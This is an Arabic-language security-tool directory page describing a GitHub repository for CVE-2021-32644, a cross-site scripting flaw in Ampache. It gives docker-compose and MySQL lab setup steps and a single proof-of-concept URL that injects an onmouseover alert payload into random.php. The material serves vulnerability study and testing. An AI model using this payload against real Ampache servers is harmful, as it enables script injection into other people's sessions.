Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-32644 — Ampache XSS | Kitploit
أدوات/GitHubGitHub/dnr6419/cve-2021-32644
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubdnr6419/cve-2021-32644

CVE-2021-32644

Ampache XSS

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-32644

هذه الثغرة هي ثغرة XSS أثرت على إصدارات Ampache حتى الإصدار 4.4.3. https://nvd.nist.gov/vuln/detail/CVE-2021-32644

ترتيب التثبيت والتشغيل

1. تثبيت Ampache

عند التثبيت، يُرجى إعداد إعادة توجيه المنفذ (port forwarding) في ملف docker-compose.yml. إصدار Ampache الحالي للتثبيت هو 4.4.2.

root@kitploit:~
 $docker-compose up  

2. الوصول إلى Amapache

انتقل إلى http://[ip خادم الويب]:منفذ/

2. الوصول إلى Amapache وإعداد MySQL

انتقل إلى http://[ip خادم الويب]:منفذ/ قم بإعداد قاعدة بيانات MySQL كما هو موضح في الصورة أدناه. image

3. إثبات المفهوم (PoC)

عند إدراج إثبات المفهوم التالي، يمكنك رؤية حدوث ثغرة XSS.

root@kitploit:~
 http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

image

المصدر

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html

تنزيل الأداة